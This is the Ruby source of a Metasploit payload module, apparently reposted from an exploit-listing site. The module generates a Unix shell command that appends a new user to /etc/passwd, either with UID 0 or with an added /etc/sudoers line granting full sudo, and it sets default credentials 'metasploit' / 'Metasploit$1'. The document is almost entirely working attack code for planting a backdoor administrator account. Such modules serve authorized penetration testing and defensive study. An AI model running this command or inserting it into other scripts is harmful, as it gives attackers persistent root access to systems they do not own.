Share
## https://sploitus.com/exploit?id=MSF:PAYLOAD-CMD-UNIX-ADDUSER-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'unix_crypt'

module MetasploitModule
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Add user with useradd',
        'Description' => %q{
          Creates a new user. By default the new user is set with sudo
          but other options exist to make the new user automatically
          root but this is not automatically set since the new user will
          be treated as root (and login may be difficult). The new user
          can also be set as just a standard user if desired.
        },
        'Author' => 'Nick Cottrell <Rad10Logic>',
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Handler' => Msf::Handler::None,
        'Session' => Msf::Sessions::CommandShell,
        'PayloadType' => 'cmd',
        'RequiredCmd' => 'generic',
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
      )

    register_options(
      [
        OptString.new('USER', [ true, 'The username to create', 'metasploit' ]),
        OptString.new('PASS', [ true, 'The password for this user', 'Metasploit$1' ])
      ]
    )

    register_advanced_options(
      [
        OptEnum.new('RootMethod', [false, 'The method to obtain root with the new user', 'SUDO', ['SUID', 'SUDO', 'NONE']]),
        OptBool.new('CheckSudoers', [false, 'Check if the sudoers file exists before modifying it', true], conditions: %w[RootMethod == SUDO])
      ]
    )
  end

  #
  # Constructs the payload
  #
  def generate(_opts = {})
    vprint_good(command_string)
    return super + command_string
  end

  def user
    if datastore['USER'] !~ /^[a-z][-a-z0-9]*$/
      raise ArgumentError, 'Username doesn\'t fit within regex /[a-z][-a-z0-9]*/'
    end

    datastore['USER']
  end

  #
  # Returns the command string to use for execution
  #
  def command_string
    suid = if datastore['RootMethod'] == 'SUID'
             '0'
           else
             rand(1010..1999).to_s
           end
    passwd = UnixCrypt::MD5.build(datastore['PASS'], 'Az')
    payload_cmd = "echo \'#{user}:#{passwd}:#{suid}:#{suid}::/:/bin/sh\'>>/etc/passwd"
    if datastore['RootMethod'] == 'SUDO'
      if datastore['CheckSudoers']
        payload_cmd += ";[ -f /etc/sudoers ]&&(echo \'#{user} ALL=(ALL:ALL) ALL\'>>/etc/sudoers)"
      else
        payload_cmd += ";echo \'#{user} ALL=(ALL:ALL) ALL\'>>/etc/sudoers"
      end
    end
    payload_cmd
  end
end